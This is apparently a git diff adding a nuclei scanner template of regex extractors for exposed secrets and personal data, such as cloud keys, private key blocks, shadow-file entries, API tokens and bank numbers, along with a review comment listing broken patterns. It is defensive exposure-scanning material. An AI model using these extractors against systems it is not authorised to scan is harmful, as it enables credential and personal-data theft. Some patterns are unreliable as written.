+ - >- + -----BEGIN DSA PRIVATE KEY-----(?:[a-zA-Z0-9\+\=\/"']|\s)+?-----END + DSA PRIVATE KEY----- + part: body + - type: regex + name: dropbox_links + regex: + - https://www.dropbox.com/(?:s|l)/\S+ + part: body + - type: regex + name: ec_private_key + regex: + - >- + -----BEGIN (?:EC|ECDSA) PRIVATE + KEY-----(?:[a-zA-Z0-9\+\=\/"']|\s)+?-----END (?:EC|ECDSA) PRIVATE + KEY----- + part: body + - 
type: regex + name: encrypted_dsa_private_key + regex: + - >- + -----BEGIN DSA PRIVATE KEY-----\s.*,ENCRYPTED(?:.|\s)+?-----END DSA + PRIVATE KEY----- + part: body + - type: regex + name: encrypted_ec_private_key + regex: + - >- + -----BEGIN (?:EC|ECDSA) PRIVATE + KEY-----\s.*,ENCRYPTED(?:.|\s)+?-----END (?:EC|ECDSA) PRIVATE + KEY----- + part: body + - type: regex + name: encrypted_private_key + regex: + - >- + -----BEGIN ENCRYPTED PRIVATE KEY-----(?:.|\s)+?-----END ENCRYPTED + PRIVATE KEY----- + part: body + - type: regex + name: encrypted_putty_ssh_dsa_key + regex: + - >- + PuTTY-User-Key-File-2: ssh-dss\s*Encryption: + aes(?:.|\s?)*?Private-MAC: + part: body + - type: regex + name: encrypted_rsa_private_key + regex: + - >- + -----BEGIN RSA PRIVATE KEY-----\s.*,ENCRYPTED(?:.|\s)+?-----END RSA + PRIVATE KEY----- + part: body + - type: regex + name: google_application_identifier + regex: + - '[0-9]+-\w+.apps.googleusercontent.com' + part: body + - type: regex + name: hipaa_phi_national_drug_code + regex: + - ^\d{4,5}-\d{3,4}-\d{1,2}$ + part: body + - type: regex + name: huawei_config_file + regex: + - sysname\ HUAWEI|set\ authentication\ password\ simple\ huawei + part: body + - type: regex + name: individual_taxpayer_identification_numbers_itin + regex: + - ^9\d{2}(?:[ \-]?)[7,8]\d(?:[ \-]?)\d{4}$ + part: body + - type: regex + name: john_the_ripper + regex: + - >- + [J,j]ohn\ [T,t]he\ [R,r]ipper|john-[1-9].[1-9].[1-9]|Many\ + salts:|Only\ one\ + salt:|openwall.com/john/|List.External:[0-9a-zA-Z]*|Loaded\ [0-9]*\ + password hash|guesses:\ \d*\ \ time:\ + \d*:\d{2}:\d{2}:\d{2}|john\.pot + part: body + - type: regex + name: keepass_1x_csv_passwords + regex: + - '"Account","Login Name","Password","Web Site","Comments"' + part: body + - type: regex + name: keepass_1x_xml_passwords + regex: + - >- + \s*?[\S\s]*?[\S\s]*?<\/pwentry>\s*?<\/pwlist> + part: body + - type: regex + name: large_number_of_us_phone_numbers + regex: + - \d{3}-\d{3}-\d{4}|\(\d{3}\)\ ?\d{3}-?\d{4} 
+ part: body + - type: regex + name: large_number_of_us_zip_codes + regex: + - ^(\d{5}-\d{4}|\d{5})$ + part: body + - type: regex + name: lightweight_directory_access_protocol + regex: + - (?:dn|cn|dc|sn):\s*[a-zA-Z0-9=, ]* + part: body + - type: regex + name: metasploit_module + regex: + - >- + require\ 'msf/core'|class\ Metasploit|include\ + Msf::Exploit::\w+::\w+ + part: body + - type: regex + name: mysql_database_dump + regex: + - >- + DROP DATABASE IF EXISTS(?:.|\n){5,300}CREATE + DATABASE(?:.|\n){5,300}DROP TABLE IF EXISTS(?:.|\n){5,300}CREATE + TABLE + part: body + - type: regex + name: mysqlite_database_dump + regex: + - >- + DROP\ TABLE\ IF\ EXISTS\ \[[a-zA-Z]*\];|CREATE\ TABLE\ + \[[a-zA-Z]*\]; + part: body + - type: regex + name: network_proxy_autoconfig + regex: + - proxy\.pac|function\ FindProxyForURL\(\w+,\ \w+\) + part: body + - type: regex + name: nmap_scan_report + regex: + - Nmap\ scan\ report\ for\ [a-zA-Z0-9.]+ + part: body + - type: regex + name: pgp_header + regex: + - '-{5}(?:BEGIN|END)\ PGP\ MESSAGE-{5}' + part: body + - type: regex + name: pgp_private_key_block + regex: + - >- + -----BEGIN PGP PRIVATE KEY BLOCK-----(?:.|\s)+?-----END PGP PRIVATE + KEY BLOCK----- + part: body + - type: regex + name: pkcs7_encrypted_data + regex: + - >- + (?:Signer|Recipient)Info(?:s)?\ ::=\ + \w+|[D|d]igest(?:Encryption)?Algorithm|EncryptedKey\ ::= \w+ + part: body + - type: regex + name: password_etc_passwd + regex: + - >- + [a-zA-Z0-9\-]+:[x|\*]:\d+:\d+:[a-zA-Z0-9/\- + "]*:/[a-zA-Z0-9/\-]*:/[a-zA-Z0-9/\-]+ + part: body + - type: regex + name: password_etc_shadow + regex: + - >- + [a-zA-Z0-9\-]+:(?:(?:!!?)|(?:\*LOCK\*?)|\*|(?:\*LCK\*?)|(?:\$.*\$.*\$.*?)?):\d*:\d*:\d*:\d*:\d*:\d*: + part: body + - type: regex + name: plaintext_private_key + regex: + - '-----BEGIN PRIVATE KEY-----(?:.|\s)+?-----END PRIVATE KEY-----' + part: body + - type: regex + name: putty_ssh_dsa_key + regex: + - >- + PuTTY-User-Key-File-2: ssh-dss\s*Encryption: + 
none(?:.|\s?)*?Private-MAC: + part: body + - type: regex + name: putty_ssh_rsa_key + regex: + - >- + PuTTY-User-Key-File-2: ssh-rsa\s*Encryption: + none(?:.|\s?)*?Private-MAC: + part: body + - type: regex + name: public_key_cryptography_system_pkcs + regex: + - protocol="application/x-pkcs[0-9]{0,2}-signature" + part: body + - type: regex + name: public_encrypted_key + regex: + - '-----BEGIN PUBLIC KEY-----(?:.|\s)+?-----END PUBLIC KEY-----' + part: body + - type: regex + name: rsa_private_key + regex: + - >- + -----BEGIN RSA PRIVATE KEY-----(?:[a-zA-Z0-9\+\=\/"']|\s)+?-----END + RSA PRIVATE KEY----- + part: body + - type: regex + name: ssl_certificate + regex: + - '-----BEGIN CERTIFICATE-----(?:.|\n)+?\s-----END CERTIFICATE-----' + part: body + - type: regex + name: swift_codes + regex: + - '[A-Za-z]{4}(?:GB|US|DE|RU|CA|JP|CN)[0-9a-zA-Z]{2,5}$' + part: body + - type: regex + name: samba_password_config_file + regex: + - '[a-z]*:\d{3}:[0-9a-zA-Z]*:[0-9a-zA-Z]*:\[U\ \]:.*' + part: body + - type: regex + name: slack_2fa_backup_codes + regex: + - >- + Two-Factor\s*\S*Authentication\s*\S*Backup\s*\S*Codes(?:.|\n)*[Ss]lack(?:.|\n)*\d{9} + part: body + - type: regex + name: uk_drivers_license_numbers + regex: + - '[A-Z]{5}\d{6}[A-Z]{2}\d{1}[A-Z]{2}' + part: body + - type: regex + name: uk_passport_number + regex: + - \d{10}GB[RP]\d{7}[UMF]{1}\d{9} + part: body + - type: regex + name: usbank_routing_numbers_california + regex: + - ^12(?:1122676|2235821)$ + part: body + - type: regex + name: united_bank_routing_number_california + regex: + - ^122243350$ + part: body + - type: regex + name: wells_fargo_routing_numbers_california + regex: + - ^121042882$ + part: body + - type: regex + name: aws_access_key + regex: + - >- + ((access[-_]?key[-_]?id)|(ACCESS[-_]?KEY[-_]?ID)|([Aa]ccessKeyId)|(access[_-]?id)).{0,20}AKIA[a-zA-Z0-9+/]{16}[^a-zA-Z0-9+/] + part: body + - type: regex + name: aws_credentials_context + regex: + - access_key_id|secret_access_key|AssetSync.configure + 
part: body + - type: regex + name: aws_secret_key + regex: + - >- + ((secret[-_]?access[-_]?key)|(SECRET[-_]?ACCESS[-_]?KEY|(private[-_]?key))|([Ss]ecretAccessKey)).{0,20}[^a-zA-Z0-9+/][a-zA-Z0-9+/]{40}\b + part: body + - type: regex + name: facebook_secret + regex: + - >- + (facebook_secret|FACEBOOK_SECRET|facebook_app_secret|FACEBOOK_APP_SECRET)[a-z_ + =\s"'\:]{0,5}[^a-zA-Z0-9][a-f0-9]{32}[^a-zA-Z0-9] + part: body + - type: regex + name: github_key + regex: + - >- + (GITHUB_SECRET|GITHUB_KEY|github_secret|github_key|github_token|GITHUB_TOKEN|github_api_key|GITHUB_API_KEY)[a-z_ + =\s"'\:]{0,10}[^a-zA-Z0-9][a-zA-Z0-9]{40}[^a-zA-Z0-9] + part: body + - type: regex + name: google_two_factor_backup + regex: + - (?:BACKUP VERIFICATION CODES|SAVE YOUR BACKUP CODES)[\s\S]{0,300}@ + part: body + - type: regex + name: heroku_key + regex: + - >- + (heroku_api_key|HEROKU_API_KEY|heroku_secret|HEROKU_SECRET)[a-z_ + =\s"'\:]{0,10}[^a-zA-Z0-9-]\w{8}(?:-\w{4}){3}-\w{12}[^a-zA-Z0-9\-] + part: body + - type: regex + name: microsoft_office_365_oauth_context + regex: + - >- + https://login.microsoftonline.com/common/oauth2/v2.0/token|https://login.windows.net/common/oauth2/token + part: body + - type: regex + name: pgsql_connection_information + regex: + - (?:postgres|pgsql)\:\/\/ + part: body + - type: regex + name: slack_api_key + regex: + - >- + (slack_api_key|SLACK_API_KEY|slack_key|SLACK_KEY)[a-z_ + =\s"'\:]{0,10}[^a-f0-9][a-f0-9]{32}[^a-f0-9] + part: body + - type: regex + name: slack_api_token + regex: + - (xox[pb](?:-[a-zA-Z0-9]+){4,}) + part: body + - type: regex + name: ssh_dss_public + regex: + - ssh-dss [0-9A-Za-z+/]+[=]{2} + part: body + - type: regex + name: ssh_rsa_public + regex: + - ssh-rsa AAAA[0-9A-Za-z+/]+[=]{0,3} [^@]+@[^@]+ + part: body + - type: regex + name: iban + regex: + - '[a-zA-Z]{2}[0-9]{2}[a-zA-Z0-9]{4}[0-9]{7}([a-zA-Z0-9]?){0,16}' + part: body + - type: regex + name: gps_data + regex: + - >- + 
^([-+]?)([\d]{1,2})(((\.)(\d+)(,)))(\s*)(([-+]?)([\d]{1,3})((\.)(\d+))?) + part: body + - type: regex + name: blood_type + regex: + - ^(A|B|AB|O)[-+]$ + part: body + - type: regex + name: date_of_birth_2 + regex: + - >- + ^([1-9]|[12][0-9]|3[01])(\/?\.\-?\-?\s?)(0[1-9]|1[12])(\/?\.?\-?\s?)(19[0-9][0-9]|20[0][0-9]|20[1][0-8])$ + part: body + - type: regex + name: tax_number + regex: + - ^[0-9]{10}$ + part: body + - type: regex + name: bitcoin_address + regex: + - ^[13][a-km-zA-HJ-NP-Z0-9]{26,33}$ + part: body diff --git a/poc/auth/secrets-patterns-rules.yaml b/poc/auth/secrets-patterns-rules.yaml new file mode 100644 index 0000000000..5eb34d9543 --- /dev/null +++ b/poc/auth/secrets-patterns-rules.yaml 
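Review bot: Several extractor regexes use lookaround, which nuclei's Go `regexp` (RE2) does not support, so as I understand its loader the whole template fails to load rather than degrade: `street_addresses` (`(?=\s|$)`), `ssn_3` and `ssn_number` (`(?!…)`), `credit_cards` (`(?![\d])`), and the `phones` and `btc_addresses` entries are visibly truncated at `(?-` where a lookbehind was lost (`btc_addresses` now continues with what looks like a git-URL pattern, suggesting dropped lines). `ssn_3` is also written in YAML double quotes, where `\b` is the backspace escape, so the engine would receive 0x08 bytes instead of word boundaries; `spain_social_security_number_ssn_2` carries a stray trailing backtick; and the folded `>-` scalars insert a space wherever a pattern was wrapped (e.g. `credit_card_2`'s `{12} |3[47]`), so long patterns are safer as single-quoted one-line scalars. The `^…$`-anchored entries (`otp`, `blood_type`, `tax_number`, `bitcoin_address`, the routing numbers, the date patterns) match only a body consisting of nothing else and are dead against HTTP responses unless `(?m)` is intended. Finally, with `global-matchers: true` and no `matchers`, broad extractors such as `times`, `prices`, `hex_colors` and `ipv4` attach a hit to nearly every response and bury the PII results this template exists for; dropping them or gating them behind a narrower matcher keeps the finding list reviewable.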
@@ -0,0 +1,4502 @@ +id: secrets-patterns-rules + +info: + name: Secrets Patterns (Rules) + author: dwisiswant0 + reference: + - https://github.com/mazen160/secrets-patterns-db # db/rules-stable.yml (151eaf659f3bcac3f81161808765eaa91045f2c7) + severity: info + tags: global-matchers,exposure,token,key,api,secret,password,generic + +http: + - global-matchers: true + extractors: + - type: regex + name: aws_api_key + regex: + - AKIA[0-9A-Z]{16} + part: body + - type: regex + name: aws_arn + regex: + - arn:aws:[a-z0-9-]+:[a-z]{2}-[a-z]+-[0-9]+:[0-9]+:.+ + part: body + - type: regex + name: aws_access_key_id_value + regex: + - (A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16} + part: body + - type: regex + name: aws_appsync_graphql_key + regex: + - da2-[a-z0-9]{26} + part: body + - type: regex + name: aws_mws_key + regex: + - >- + amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12} + part: body + - type: regex + name: aws_rds + regex: + - '[0-9a-z._-]+.rds.amazonaws.com' + part: body + - type: regex + name: aws_s3_bucket + regex: + - s3://[0-9a-z._/-]+ + part: body + - type: regex + name: aws_cred_file_info + regex: + - (aws_access_key_id|aws_secret_access_key) + part: body + - type: regex + name: abbysale + regex: + - (?:abbysale).{0,40}\b([a-z0-9A-Z]{40})\b + part: body + - type: regex + name: abstract + regex: + - (?:abstract).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: abuseipdb + regex: + - (?:abuseipdb).{0,40}\b([a-z0-9]{80})\b + part: body + - type: regex + name: accuweather + regex: + - (?:accuweather).{0,40}([a-z0-9A-Z\%]{35})\b + part: body + - type: regex + name: adafruitio + regex: + - \b(aio\_[a-zA-Z0-9]{28})\b + part: body + - type: regex + name: adobeio_1 + regex: + - (?:adobe).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: adzuna_1 + regex: + - (?:adzuna).{0,40}\b([a-z0-9]{8})\b + part: body + - type: regex + name: adzuna_2 + regex: + - (?:adzuna).{0,40}\b([a-z0-9]{32})\b + part: body + - 
type: regex + name: aeroworkflow_1 + regex: + - (?:aeroworkflow).{0,40}\b([0-9]{1,})\b + part: body + - type: regex + name: aeroworkflow_2 + regex: + - (?:aeroworkflow).{0,40}\b([a-zA-Z0-9^!]{20})\b + part: body + - type: regex + name: agora + regex: + - (?:agora).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: airbrakeprojectkey_1 + regex: + - (?:airbrake).{0,40}\b([0-9]{6})\b + part: body + - type: regex + name: airbrakeprojectkey_2 + regex: + - (?:airbrake).{0,40}\b([a-zA-Z-0-9]{32})\b + part: body + - type: regex + name: airbrakeuserkey + regex: + - (?:airbrake).{0,40}\b([a-zA-Z-0-9]{40})\b + part: body + - type: regex + name: airship + regex: + - (?:airship).{0,40}\b([0-9Aa-zA-Z]{91})\b + part: body + - type: regex + name: airvisual + regex: + - (?:airvisual).{0,40}\b([a-z0-9-]{36})\b + part: body + - type: regex + name: alconost + regex: + - (?:alconost).{0,40}\b([0-9Aa-z]{32})\b + part: body + - type: regex + name: alegra_1 + regex: + - (?:alegra).{0,40}\b([a-z0-9-]{20})\b + part: body + - type: regex + name: alegra_2 + regex: + - (?:alegra).{0,40}\b([a-zA-Z0-9.-@]{25,30})\b + part: body + - type: regex + name: aletheiaapi + regex: + - (?:aletheiaapi).{0,40}\b([A-Z0-9]{32})\b + part: body + - type: regex + name: alibaba_2 + regex: + - \b(LTAI[a-zA-Z0-9]{17,21})[\"' ;\s]* + part: body + - type: regex + name: alienvault + regex: + - (?:alienvault).{0,40}\b([a-z0-9]{64})\b + part: body + - type: regex + name: allsports + regex: + - (?:allsports).{0,40}\b([0-9a-z]{64})\b + part: body + - type: regex + name: amadeus_1 + regex: + - (?:amadeus).{0,40}\b([0-9A-Za-z]{32})\b + part: body + - type: regex + name: amadeus_2 + regex: + - (?:amadeus).{0,40}\b([0-9A-Za-z]{16})\b + part: body + - type: regex + name: ambee + regex: + - (?:ambee).{0,40}\b([0-9a-f]{64})\b + part: body + - type: regex + name: amplitudeapikey + regex: + - (?:amplitude).{0,40}\b([a-f0-9]{32}) + part: body + - type: regex + name: apacta + regex: + - 
(?:apacta).{0,40}\b([a-z0-9-]{36})\b + part: body + - type: regex + name: api2cart + regex: + - (?:api2cart).{0,40}\b([0-9a-f]{32})\b + part: body + - type: regex + name: apideck_1 + regex: + - \b(sk_live_[a-z0-9A-Z-]{93})\b + part: body + - type: regex + name: apideck_2 + regex: + - (?:apideck).{0,40}\b([a-z0-9A-Z]{40})\b + part: body + - type: regex + name: apiflash_1 + regex: + - (?:apiflash).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: apiflash_2 + regex: + - (?:apiflash).{0,40}\b([a-zA-Z0-9\S]{21,30})\b + part: body + - type: regex + name: apifonica + regex: + - >- + (?:apifonica).{0,40}\b([0-9a-z]{11}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{12})\b + part: body + - type: regex + name: apify + regex: + - \b(apify\_api\_[a-zA-Z-0-9]{36})\b + part: body + - type: regex + name: apimatic_1 + regex: + - (?:apimatic).{0,40}\b([a-z0-9-\S]{8,32})\b + part: body + - type: regex + name: apimatic_2 + regex: + - >- + (?:apimatic).{0,40}\b([a-zA-Z0-9]{3,20}@[a-zA-Z0-9]{2,12}.[a-zA-Z0-9]{2,5})\b + part: body + - type: regex + name: apiscience + regex: + - (?:apiscience).{0,40}\b([a-bA-Z0-9\S]{22})\b + part: body + - type: regex + name: apollo + regex: + - (?:apollo).{0,40}\b([a-zA-Z0-9]{22})\b + part: body + - type: regex + name: appcues_1 + regex: + - (?:appcues).{0,40}\b([0-9]{5})\b + part: body + - type: regex + name: appcues_2 + regex: + - (?:appcues).{0,40}\b([a-z0-9-]{36})\b + part: body + - type: regex + name: appcues_3 + regex: + - (?:appcues).{0,40}\b([a-z0-9-]{39})\b + part: body + - type: regex + name: appfollow + regex: + - (?:appfollow).{0,40}\b([0-9A-Za-z]{20})\b + part: body + - type: regex + name: appsynergy + regex: + - (?:appsynergy).{0,40}\b([a-z0-9]{64})\b + part: body + - type: regex + name: apptivo_1 + regex: + - (?:apptivo).{0,40}\b([a-z0-9-]{36})\b + part: body + - type: regex + name: apptivo_2 + regex: + - (?:apptivo).{0,40}\b([a-zA-Z0-9-]{32})\b + part: body + - type: regex + name: artifactory_2 + regex: + - 
\b([A-Za-z0-9](?:[A-Za-z0-9\-]{0,61}[A-Za-z0-9])\.jfrog\.io) + part: body + - type: regex + name: artsy_1 + regex: + - (?:artsy).{0,40}\b([0-9a-zA-Z]{20})\b + part: body + - type: regex + name: artsy_2 + regex: + - (?:artsy).{0,40}\b([0-9a-zA-Z]{32})\b + part: body + - type: regex + name: asanaoauth + regex: + - (?:asana).{0,40}\b([a-z\/:0-9]{51})\b + part: body + - type: regex + name: asanapersonalaccesstoken + regex: + - (?:asana).{0,40}\b([0-9]{1,}\/[0-9]{16,}:[A-Za-z0-9]{32,})\b + part: body + - type: regex + name: assemblyai + regex: + - (?:assemblyai).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: asymmetric_private_key + regex: + - '-----BEGIN ((EC|PGP|DSA|RSA|OPENSSH) )?PRIVATE KEY( BLOCK)?-----' + part: body + - type: regex + name: audd + regex: + - (?:audd).{0,40}\b([a-z0-9-]{32})\b + part: body + - type: regex + name: auth0managementapitoken + regex: + - (?:auth0).{0,40}\b(ey[a-zA-Z0-9._-]+)\b + part: body + - type: regex + name: autodesk_1 + regex: + - (?:autodesk).{0,40}\b([0-9A-Za-z]{32})\b + part: body + - type: regex + name: autodesk_2 + regex: + - (?:autodesk).{0,40}\b([0-9A-Za-z]{16})\b + part: body + - type: regex + name: autoklose + regex: + - (?:autoklose).{0,40}\b([a-zA-Z0-9-]{32})\b + part: body + - type: regex + name: autopilot + regex: + - (?:autopilot).{0,40}\b([0-9a-f]{32})\b + part: body + - type: regex + name: avazapersonalaccesstoken + regex: + - (?:avaza).{0,40}\b([0-9]+-[0-9a-f]{40})\b + part: body + - type: regex + name: aviationstack + regex: + - (?:aviationstack).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: aws_1 + regex: + - \b((?:AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16})\b + part: body + - type: regex + name: axonaut + regex: + - (?:axonaut).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: aylien_1 + regex: + - (?:aylien).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: aylien_2 + regex: + - (?:aylien).{0,40}\b([a-z0-9]{8})\b + part: body + - type: regex + name: ayrshare + regex: 
+ - >- + (?:ayrshare).{0,40}\b([A-Z]{7}-[A-Z0-9]{7}-[A-Z0-9]{7}-[A-Z0-9]{7})\b + part: body + - type: regex + name: bannerbear + regex: + - (?:bannerbear).{0,40}\b([0-9a-zA-Z]{22}tt)\b + part: body + - type: regex + name: baremetrics + regex: + - (?:baremetrics).{0,40}\b([a-zA-Z0-9_]{25})\b + part: body + - type: regex + name: baseapiio + regex: + - >- + (?:baseapi|base-api).{0,40}\b([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b + part: body + - type: regex + name: beamer + regex: + - (?:beamer).{0,40}\b([a-zA-Z0-9_+/]{45}=) + part: body + - type: regex + name: beebole + regex: + - (?:beebole).{0,40}\b([0-9a-z]{40})\b + part: body + - type: regex + name: besttime + regex: + - (?:besttime).{0,40}\b([0-9A-Za-z_]{36})\b + part: body + - type: regex + name: billomat_1 + regex: + - (?:billomat).{0,40}\b([0-9a-z]{1,})\b + part: body + - type: regex + name: billomat_2 + regex: + - (?:billomat).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: bitbar + regex: + - (?:bitbar).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: bitcoinaverage + regex: + - (?:bitcoinaverage).{0,40}\b([a-zA-Z0-9]{43})\b + part: body + - type: regex + name: bitfinex + regex: + - (?:bitfinex).{0,40}\b([A-Za-z0-9_-]{43})\b + part: body + - type: regex + name: bitly_secret_key + regex: + - R_[0-9a-f]{32} + part: body + - type: regex + name: bitlyaccesstoken + regex: + - (?:bitly).{0,40}\b([a-zA-Z-0-9]{40})\b + part: body + - type: regex + name: bitmex_1 + regex: + - (?:bitmex).{0,40}([ \r\n]{1}[0-9a-zA-Z\-\_]{24}[ \r\n]{1}) + part: body + - type: regex + name: bitmex_2 + regex: + - (?:bitmex).{0,40}([ \r\n]{1}[0-9a-zA-Z\-\_]{48}[ \r\n]{1}) + part: body + - type: regex + name: blablabus + regex: + - (?:blablabus).{0,40}\b([0-9A-Za-z]{22})\b + part: body + - type: regex + name: blazemeter + regex: + - >- + (?:blazemeter|runscope).{0,40}\b([0-9a-z]{8}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{12})\b + part: body + - type: regex + name: blitapp + regex: + - 
(?:blitapp).{0,40}\b([a-zA-Z0-9_-]{39})\b + part: body + - type: regex + name: bombbomb + regex: + - (?:bombbomb).{0,40}\b([a-zA-Z0-9-._]{704})\b + part: body + - type: regex + name: boostnote + regex: + - (?:boostnote).{0,40}\b([0-9a-f]{64})\b + part: body + - type: regex + name: borgbase + regex: + - (?:borgbase).{0,40}\b([a-zA-Z0-9/_.-]{148,152})\b + part: body + - type: regex + name: braintree_api_key + regex: + - access_token$production$[0-9a-z]{16}$[0-9a-f]{32} + part: body + - type: regex + name: brandfetch + regex: + - (?:brandfetch).{0,40}\b([0-9A-Za-z]{40})\b + part: body + - type: regex + name: browshot + regex: + - (?:browshot).{0,40}\b([a-zA-Z-0-9]{28})\b + part: body + - type: regex + name: buddyns + regex: + - (?:buddyns).{0,40}\b([0-9a-z]{40})\b + part: body + - type: regex + name: bugherd + regex: + - (?:bugherd).{0,40}\b([0-9a-z]{22})\b + part: body + - type: regex + name: bugsnag + regex: + - >- + (?:bugsnag).{0,40}\b([0-9a-z]{8}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{12})\b + part: body + - type: regex + name: buildkite + regex: + - (?:buildkite).{0,40}\b([a-z0-9]{40})\b + part: body + - type: regex + name: bulbul + regex: + - (?:bulbul).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: buttercms + regex: + - (?:buttercms).{0,40}\b([a-z0-9]{40})\b + part: body + - type: regex + name: caflou + regex: + - (?:caflou).{0,40}\b([a-bA-Z0-9\S]{155})\b + part: body + - type: regex + name: calendarific + regex: + - (?:calendarific).{0,40}\b([a-z0-9]{40})\b + part: body + - type: regex + name: calendlyapikey + regex: + - >- + (?:calendly).{0,40}\b([a-zA-Z-0-9]{20}.[a-zA-Z-0-9]{171}.[a-zA-Z-0-9_]{43})\b + part: body + - type: regex + name: calorieninja + regex: + - (?:calorieninja).{0,40}\b([0-9A-Za-z]{40})\b + part: body + - type: regex + name: campayn + regex: + - (?:campayn).{0,40}\b([a-z0-9]{64})\b + part: body + - type: regex + name: cannyio + regex: + - >- + 
(?:canny).{0,40}\b([a-z0-9]{8}-[a-z0-9]{4}-[a-z0-9]{4}-[0-9]{4}-[a-z0-9]{12})\b + part: body + - type: regex + name: capsulecrm + regex: + - (?:capsulecrm).{0,40}\b([a-zA-Z0-9-._+=]{64})\b + part: body + - type: regex + name: captaindata_1 + regex: + - >- + (?:captaindata).{0,40}\b([0-9a-f]{8}\-[0-9a-f]{4}\-[0-9a-f]{4}\-[0-9a-f]{4}\-[0-9a-f]{12})\b + part: body + - type: regex + name: captaindata_2 + regex: + - (?:captaindata).{0,40}\b([0-9a-f]{64})\b + part: body + - type: regex + name: carboninterface + regex: + - (?:carboninterface).{0,40}\b([a-zA-Z0-9]{21})\b + part: body + - type: regex + name: cashboard_1 + regex: + - >- + (?:cashboard).{0,40}\b([0-9A-Z]{3}-[0-9A-Z]{3}-[0-9A-Z]{3}-[0-9A-Z]{3})\b + part: body + - type: regex + name: cashboard_2 + regex: + - (?:cashboard).{0,40}\b([0-9a-z]{1,})\b + part: body + - type: regex + name: caspio_1 + regex: + - (?:caspio).{0,40}\b([a-z0-9]{8})\b + part: body + - type: regex + name: caspio_2 + regex: + - (?:caspio).{0,40}\b([a-z0-9]{50})\b + part: body + - type: regex + name: censys_1 + regex: + - (?:censys).{0,40}\b([a-zA-Z0-9]{32})\b + part: body + - type: regex + name: censys_2 + regex: + - (?:censys).{0,40}\b([a-z0-9-]{36})\b + part: body + - type: regex + name: centralstationcrm + regex: + - (?:centralstation).{0,40}\b([a-z0-9]{30})\b + part: body + - type: regex + name: cexio_1 + regex: + - (?:cexio|cex.io).{0,40}\b([a-z]{2}[0-9]{9})\b + part: body + - type: regex + name: cexio_2 + regex: + - (?:cexio|cex.io).{0,40}\b([0-9A-Za-z]{24,27})\b + part: body + - type: regex + name: chatbot + regex: + - (?:chatbot).{0,40}\b([a-zA-Z0-9_]{32})\b + part: body + - type: regex + name: chatfule + regex: + - (?:chatfuel).{0,40}\b([a-zA-Z0-9]{128})\b + part: body + - type: regex + name: checio + regex: + - (?:checio).{0,40}\b(pk_[a-z0-9]{45})\b + part: body + - type: regex + name: checklyhq + regex: + - (?:checklyhq).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: checkout_1 + regex: + - >- + 
(?:checkout).{0,40}\b((sk_|sk_test_)[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})\b + part: body + - type: regex + name: checkout_2 + regex: + - (?:checkout).{0,40}\b(cus_[0-9a-zA-Z]{26})\b + part: body + - type: regex + name: checkvist_1 + regex: + - (?:checkvist).{0,40}\b([\w\.-]+@[\w-]+\.[\w\.-]{2,5})\b + part: body + - type: regex + name: checkvist_2 + regex: + - (?:checkvist).{0,40}\b([0-9a-zA-Z]{14})\b + part: body + - type: regex + name: cicero + regex: + - (?:cicero).{0,40}\b([0-9a-z]{40})\b + part: body + - type: regex + name: clearbit + regex: + - (?:clearbit).{0,40}\b([0-9a-z_]{35})\b + part: body + - type: regex + name: clickhelp_1 + regex: + - \b([0-9A-Za-z]{3,20}.try.clickhelp.co)\b + part: body + - type: regex + name: clickhelp_2 + regex: + - (?:clickhelp).{0,40}\b([0-9A-Za-z]{24})\b + part: body + - type: regex + name: clicksendsms_2 + regex: + - >- + (?:sms).{0,40}\b([a-zA-Z0-9]{3,20}@[a-zA-Z0-9]{2,12}.[a-zA-Z0-9]{2,5})\b + part: body + - type: regex + name: clickuppersonaltoken + regex: + - (?:clickup).{0,40}\b(pk_[0-9]{8}_[0-9A-Z]{32})\b + part: body + - type: regex + name: cliengo + regex: + - >- + (?:cliengo).{0,40}\b([0-9a-f]{8}\-[0-9a-f]{4}\-[0-9a-f]{4}\-[0-9a-f]{4}\-[0-9a-f]{12})\b + part: body + - type: regex + name: clinchpad + regex: + - (?:clinchpad).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: clockify + regex: + - (?:clockify).{0,40}\b([a-zA-Z0-9]{48})\b + part: body + - type: regex + name: clockworksms_1 + regex: + - (?:clockwork|textanywhere).{0,40}\b([0-9a-zA-Z]{24})\b + part: body + - type: regex + name: clockworksms_2 + regex: + - (?:clockwork|textanywhere).{0,40}\b([0-9]{5})\b + part: body + - type: regex + name: closecrm + regex: + - \b(api_[a-z0-9A-Z.]{45})\b + part: body + - type: regex + name: cloudelements_1 + regex: + - (?:cloudelements).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: cloudelements_2 + regex: + - (?:cloudelements).{0,40}\b([a-zA-Z0-9]{43})\b + 
